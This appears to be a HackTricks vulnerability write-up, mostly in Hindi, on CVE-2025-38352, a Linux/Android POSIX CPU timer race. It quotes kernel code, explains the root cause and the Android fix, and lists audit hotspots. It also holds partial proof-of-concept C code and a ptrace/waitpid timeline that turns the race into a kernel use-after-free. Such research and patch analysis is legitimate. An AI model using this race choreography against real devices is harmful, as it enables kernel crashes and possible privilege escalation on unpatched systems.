POSIX CPU Timers TOCTOU race (CVE-2025-38352)

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!

हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**

हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

यह पेज Linux/Android POSIX CPU timers में एक TOCTOU race condition का दस्तावेज़ प्रस्तुत करता है जो timer state को भ्रष्ट कर सकता है और kernel को क्रैश कर सकता है, और कुछ परिस्थितियों में यह privilege escalation की दिशा में मोड़ा जा सकता है।

प्रभावित घटक: kernel/time/posix-cpu-timers.c
Primitive: task exit के दौरान expiry बनाम deletion race
Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)

त्वरित आंतरिक सारांश (relevant for exploitation)

Three CPU clocks cpu_clock_sample() के माध्यम से timers का accounting ड्राइव करते हैं:
CPUCLOCK_PROF: utime + stime
CPUCLOCK_VIRT: utime only
CPUCLOCK_SCHED: task_sched_runtime()
Timer creation wires a timer to a task/pid and initializes the timerqueue nodes:

static int posix_cpu_timer_create(struct k_itimer *new_timer) {
struct pid *pid;
rcu_read_lock();
pid = pid_for_clock(new_timer->it_clock, false);
if (!pid) { rcu_read_unlock(); return -EINVAL; }
new_timer->kclock = &clock_posix_cpu;
timerqueue_init(&new_timer->it.cpu.node);
new_timer->it.cpu.pid = get_pid(pid);
rcu_read_unlock();
return 0;
}

Arming per-base timerqueue में डालता है और संभवतः next-expiry cache को अपडेट कर सकता है:

static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
struct posix_cputimer_base *base = timer_base(timer, p);
struct cpu_timer *ctmr = &timer->it.cpu;
u64 newexp = cpu_timer_getexpires(ctmr);
if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
if (newexp < base->nextevt) base->nextevt = newexp;
}

फास्ट पाथ महँगी प्रोसेसिंग से बचता है जब तक कि cached expiries संभावित ट्रिगर होने का संकेत न दें:

static inline bool fastpath_timer_check(struct task_struct *tsk) {
struct posix_cputimers *pct = &tsk->posix_cputimers;
if (!expiry_cache_is_inactive(pct)) {
u64 samples[CPUCLOCK_MAX];
task_sample_cputime(tsk, samples);
if (task_cputimers_expired(samples, pct))
return true;
}
return false;
}

Expiration expired timers को इकट्ठा करता है, उन्हें firing के रूप में चिह्नित करता है, उन्हें queue से हटा देता है; actual delivery स्थगित कर दी जाती है:

#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
struct list_head *firing, u64 now) {
struct timerqueue_node *next; int i = 0;
while ((next = timerqueue_getnext(head))) {
struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
u64 expires = cpu_timer_getexpires(ctmr);
if (++i == MAX_COLLECTED || now < expires) return expires;
ctmr->firing = 1;                           // critical state
rcu_assign_pointer(ctmr->handling, current);
cpu_timer_dequeue(ctmr);
list_add_tail(&ctmr->elist, firing);
}
return U64_MAX;
}

दो समाप्ति-प्रसंस्करण मोड

CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: समाप्ति लक्षित task पर task_work के माध्यम से स्थगित की जाती है
CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: समाप्ति सीधे IRQ context में संभाली जाती है

Task_work vs IRQ समाप्ति पथ

```c void run_posix_cpu_timers(void) { struct task_struct *tsk = current; __run_posix_cpu_timers(tsk); } #ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK static inline void __run_posix_cpu_timers(struct task_struct *tsk) { if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled)) return; tsk->posix_cputimers_work.scheduled = true; task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME); } #else static inline void __run_posix_cpu_timers(struct task_struct *tsk) { lockdep_posixtimer_enter(); handle_posix_cpu_timers(tsk); // IRQ-context path lockdep_posixtimer_exit(); } #endif ```

IRQ-context path में, firing list को sighand के बाहर प्रोसेस किया जाता है

IRQ-context delivery loop

```c static void handle_posix_cpu_timers(struct task_struct *tsk) { struct k_itimer *timer, *next; unsigned long flags, start; LIST_HEAD(firing); if (!lock_task_sighand(tsk, &flags)) return; // may fail on exit do { start = READ_ONCE(jiffies); barrier(); check_thread_timers(tsk, &firing); check_process_timers(tsk, &firing); } while (!posix_cpu_timers_enable_work(tsk, start)); unlock_task_sighand(tsk, &flags); // race window opens here list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) { int cpu_firing; spin_lock(&timer->it_lock); list_del_init(&timer->it.cpu.elist); cpu_firing = timer->it.cpu.firing; // read then reset timer->it.cpu.firing = 0; if (likely(cpu_firing >= 0)) cpu_timer_fire(timer); rcu_assign_pointer(timer->it.cpu.handling, NULL); spin_unlock(&timer->it_lock); } } ```

मूल कारण: IRQ-time expiry और task exit के दौरान समवर्ती deletion के बीच TOCTOU पूर्व शर्तें

CONFIG_POSIX_CPU_TIMERS_TASK_WORK disabled है (IRQ path का उपयोग हो रहा है)
लक्षित task exiting है पर पूरी तरह reaped नहीं हुआ है
एक अन्य thread समवर्ती रूप से वही timer के लिए posix_cpu_timer_del() को कॉल कर रहा है

क्रम

update_process_times() exiting task के लिए IRQ context में run_posix_cpu_timers() को trigger करता है।
collect_timerqueue() ctmr->firing = 1 सेट करता है और timer को अस्थायी firing list में स्थानांतरित कर देता है।
handle_posix_cpu_timers() lock के बाहर timers deliver करने के लिए unlock_task_sighand() के माध्यम से sighand को drop करता है।
unlock के तुरंत बाद, exiting task reaped हो सकता है; एक sibling thread posix_cpu_timer_del() को execute करता है।
इस विंडो में, posix_cpu_timer_del() cpu_timer_task_rcu()/lock_task_sighand() के जरिए state हासिल करने में विफल हो सकता है और इस प्रकार timer->it.cpu.firing को चेक करने वाले सामान्य in-flight guard को स्किप कर देता है। Deletion ऐसे आगे बढ़ता है मानो firing नहीं हो रहा है, expiry संभाले जाने के दौरान state corrupt हो जाता है, जिससे crashes/UB होते हैं।

How release_task() और timer_delete() firing timers को free करते हैं

यहाँ तक कि handle_posix_cpu_timers() ने timer को task list से हटा दिया हो, एक ptraced zombie अभी भी reaped किया जा सकता है। waitpid() stack release_task() → __exit_signal() को drive करता है, जो sighand और signal queues को tear down कर देता है जबकि एक अन्य CPU अभी भी timer object के pointers रखें हुए होता है:

static void __exit_signal(struct task_struct *tsk)
{
struct sighand_struct *sighand = lock_task_sighand(tsk, NULL);
// ... signal cleanup elided ...
tsk->sighand = NULL;             // makes future lock_task_sighand() fail
unlock_task_sighand(tsk, NULL);
}

जब sighand अलग कर दिया जाता है, तब भी timer_delete() सफलता लौटाता है क्योंकि posix_cpu_timer_del() लॉकिंग विफल होने पर ret = 0 ही छोड़ देता है, इसलिए syscall RCU के माध्यम से ऑब्जेक्ट को मुक्त करने के लिए आगे बढ़ता है:

static int posix_cpu_timer_del(struct k_itimer *timer)
{
struct sighand_struct *sighand = lock_task_sighand(p, &flags);
if (unlikely(!sighand))
goto out;                   // ret stays 0 -> userland sees success
// ... normal unlink path ...
}

SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
if (timer_delete_hook(timer) == TIMER_RETRY)
timer = timer_wait_running(timer, &flags);
posix_timer_unhash_and_free(timer);            // call_rcu(k_itimer_rcu_free)
return 0;
}

क्योंकि slab object RCU-freed होता है जबकि IRQ context अभी भी firing list को वॉक कर रहा होता है, timer cache का reuse UAF primitive बन जाता है।

ptrace + waitpid के साथ reaping को नियंत्रित करना

एक zombie को auto-reaped हुए बिना बनाए रखने का सबसे आसान तरीका है non-leader worker thread को ptrace करना। exit_notify() पहले exit_state = EXIT_ZOMBIE सेट करता है और केवल तब EXIT_DEAD में परिवर्तित होता है अगर autoreap true हो। ptraced threads के लिए, autoreap = do_notify_parent() false ही रहता है जब तक SIGCHLD ignore न किया गया हो, इसलिए release_task() केवल तब चलता है जब parent स्पष्ट रूप से waitpid() कॉल करता है:

tracee के अंदर pthread_create() का उपयोग करें ताकि victim thread-group leader न हो (wait_task_zombie() ptraced non-leaders को हैंडल करता है)।
Parent ptrace(PTRACE_ATTACH, tid) जारी करता है और बाद में waitpid(tid, __WALL) चलाता है ताकि do_wait_pid() → wait_task_zombie() → release_task() चलें।
Pipes या shared memory exact TID parent को पहुँचाता है ताकि आवश्यक worker को मांग पर reaped किया जा सके।

यह choreography एक ऐसा window गारंटी देती है जहाँ handle_posix_cpu_timers() अभी भी tsk->sighand को संदर्भित कर सकता है, जबकि उसके बाद का waitpid() इसे teardown कर देता है और timer_delete() को वही k_itimer object reclaim करने की अनुमति देता है।

क्यों TASK_WORK मोड design के हिसाब से सुरक्षित है

With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry को task_work पर स्थगित कर दिया जाता है; exit_task_work, exit_notify से पहले चलता है, इसलिए IRQ-समय पर reaping के साथ overlap नहीं होता।
फिर भी, अगर task पहले ही exiting है, तो task_work_add() असफल हो जाता है; exit_state पर gating दोनों मोड्स को सुसंगत बनाता है।

Fix (Android common kernel) और कारण

यदि current task exiting हो रहा है तो early return जोड़ें, जिससे सभी processing gated हो:

// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
return;

यह exiting tasks के लिए handle_posix_cpu_timers() में प्रवेश होने से रोकता है, और उस विंडो को समाप्त कर देता है जहाँ posix_cpu_timer_del() it.cpu.firing को मिस कर सकता था और expiry processing के साथ race कर सकता था।

Impact

timer संरचनाओं का concurrent expiry/deletion के दौरान kernel memory corruption तात्कालिक क्रैश (DoS) पैदा कर सकता है और arbitrary kernel-state manipulation के अवसरों के कारण privilege escalation के लिए एक मजबूत primitive है।

Triggering the bug (safe, reproducible conditions) Build/config

सुनिश्चित करें CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n और exit_state gating fix के बिना एक kernel का उपयोग करें। On x86/arm64 इस विकल्प को सामान्यतः HAVE_POSIX_CPU_TIMERS_TASK_WORK के माध्यम से मजबूर किया जाता है, इसलिए शोधकर्ता अक्सर मैन्युअल toggle दिखाने के लिए kernel/time/Kconfig को patch करते हैं:

config POSIX_CPU_TIMERS_TASK_WORK
bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
default y

यह Android विक्रेताओं द्वारा analysis builds के लिए किए गए काम का प्रतिबिंब है; upstream x86_64 और arm64 HAVE_POSIX_CPU_TIMERS_TASK_WORK=y को मजबूर करते हैं, इसलिए कमजोर IRQ path मुख्यतः 32-bit Android kernels पर मौजूद है जहाँ यह विकल्प compiled out होता है।

Run on a multi-core VM (e.g., QEMU -smp cores=4) so parent, child main, and worker threads can stay pinned to dedicated CPUs.

Runtime strategy

Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, …)
For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, …)
बहुत छोटा प्रारंभिक समाप्ति समय और छोटा अंतराल सेट करें ताकि IRQ-path प्रविष्टियाँ अधिकतम हों:

static timer_t t;
static void setup_cpu_timer(void) {
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_SIGNAL;    // delivery type not critical for the race
sev.sigev_signo = SIGUSR1;
if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t)) perror("timer_create");
struct itimerspec its = {0};
its.it_value.tv_nsec = 1;           // fire ASAP
its.it_interval.tv_nsec = 1;        // re-fire
if (timer_settime(t, 0, &its, NULL)) perror("timer_settime");
}

एक sibling thread से, target thread के exit होने के दौरान उसी timer को समांतर रूप से हटाएँ:

void *deleter(void *arg) {
for (;;) (void)timer_delete(t);     // hammer delete in a loop
}

रेस को तेज करने वाले कारक: उच्च scheduler टिक दर, CPU लोड, बार-बार thread exit/re-create चक्र। क्रैश आमतौर पर तब होता है जब posix_cpu_timer_del() firing को नोटिस करना छोड़ देता है क्योंकि task lookup/locking असफल हो जाता है ठीक unlock_task_sighand() के बाद।

व्यावहारिक PoC समन्वयन

थ्रेड और IPC समन्वयन

एक विश्वसनीय पुनरुत्पादक ptracing parent और एक child में fork होता है जो vulnerable worker thread spawn करता है। दो पाइप (c2p, p2c) worker TID भेजते हैं और प्रत्येक चरण को gate करते हैं, जबकि एक pthread_barrier_t worker को उसका timer arm करने से रोकता है जब तक parent attach न कर ले। प्रत्येक process या thread को sched_setaffinity() के साथ pinned किया जाता है (उदा., parent CPU1 पर, child main CPU0 पर, worker CPU2 पर) ताकि scheduler शोर कम रहे और race पुनरुत्पाद्य रहे।

CLOCK_THREAD_CPUTIME_ID के साथ टाइमर कैलिब्रेशन

worker एक per-thread CPU timer arm करता है ताकि केवल उसकी अपनी CPU खपत ही deadline आगे बढ़ाए। एक समायोज्य wait_time (डिफ़ॉल्ट ≈250 µs CPU समय) और एक bounded busy loop यह सुनिश्चित करते हैं कि exit_notify() EXIT_ZOMBIE सेट करे जबकि timer अभी फायर होने ही वाला होता है:

न्यूनतम प्रति-थ्रेड CPU टाइमर ढांचा

```c static timer_t timer; static long wait_time = 250000; // nanoseconds of CPU time

static void timer_fire(sigval_t unused) { puts(“timer fired”); }

static void *worker(void *arg) { struct sigevent sev = {0}; sev.sigev_notify = SIGEV_THREAD; sev.sigev_notify_function = timer_fire; timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);

struct itimerspec ts = { .it_interval = {0, 0}, .it_value = {0, wait_time}, };

pthread_barrier_wait(&barrier); // released by child main after ptrace attach timer_settime(timer, 0, &ts, NULL);

for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting return NULL; // do_exit() keeps burning CPU }

</details>

#### रेस टाइमलाइन
1. Child parent को worker TID `c2p` के माध्यम से बताता है, फिर barrier पर ब्लॉक हो जाता है।
2. Parent `PTRACE_ATTACH` करता है, `waitpid(__WALL)` में रुकता है, फिर worker को चलने और exit करने देने के लिए `PTRACE_CONT` करता है।
3. जब heuristics (या मैन्युअल ऑपरेटर इनपुट) संकेत करते हैं कि timer IRQ-side `firing` सूची में एकत्र हो गया था, तो parent फिर से `waitpid(tid, __WALL)` चलाता है ताकि release_task() ट्रिगर हो और `tsk->sighand` गिर जाए।
4. Parent `p2c` के माध्यम से child को signal भेजता है ताकि child main `timer_delete(timer)` कॉल कर सके और तुरंत `wait_for_rcu()` जैसे helper चलाकर timer की RCU callback के पूरा होने तक इंतजार करे।
5. आख़िरकार IRQ context `handle_posix_cpu_timers()` को resume करता है और मुक्त किए गए `struct k_itimer` को dereference करता है, जिससे KASAN या WARN_ON() ट्रिप हो जाते हैं।

#### Optional kernel instrumentation
रिसर्च सेटअप्स के लिए, जब `tsk->comm == "SLOWME"` हो तो handle_posix_cpu_timers() के अंदर debug-only `mdelay(500)` इंजेक्ट करना विंडो को चौड़ा कर देता है ताकि ऊपर वर्णित क्रम लगभग हमेशा race जीत जाए। यही PoC threads का नाम भी बदलता है (`prctl(PR_SET_NAME, ...)`) ताकि kernel logs और breakpoints पुष्टि कर सकें कि अपेक्षित worker सही में reaped हो रहा है।

### Instrumentation cues during exploitation
- unlock_task_sighand()/posix_cpu_timer_del() के आस-पास tracepoints/WARN_ONCE जोड़ें ताकि उन मामलों का पता चले जहाँ `it.cpu.firing==1` और cpu_timer_task_rcu()/lock_task_sighand() की विफलता एक साथ होती है; victim के exit होने पर timerqueue की consistency की निगरानी करें।
- KASAN सामान्यतः posix_timer_queue_signal() के अंदर `slab-use-after-free` रिपोर्ट करता है, जबकि non-KASAN kernels race के लैंड होने पर send_sigqueue() से WARN_ON_ONCE() लॉग करते हैं, जो त्वरित success संकेत देता है।

Audit hotspots (for reviewers)
- update_process_times() → run_posix_cpu_timers() (IRQ)
- __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
- collect_timerqueue(): sets ctmr->firing and moves nodes
- handle_posix_cpu_timers(): drops sighand before firing loop
- posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap

Notes for exploitation research
- The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.

## संदर्भ
- [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
- [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
- [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
- [CVE-2025-38352 – In-the-wild Android Kernel Vulnerability Analysis and PoC](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
- [poc-CVE-2025-38352 (GitHub)](https://github.com/farazsth98/poc-CVE-2025-38352)
- [Linux stable fix commit f90fff1e152d](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca)

> [!TIP]
> AWS हैकिंग सीखें और अभ्यास करें:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP हैकिंग सीखें और अभ्यास करें: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Azure हैकिंग सीखें और अभ्यास करें: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks का समर्थन करें</summary>
>
> - [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
> - **हमारे** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या **हमें** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो करें।**
> - **हैकिंग ट्रिक्स साझा करें और** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिटहब रिपोजिटरी में PRs सबमिट करें।
>
> </details>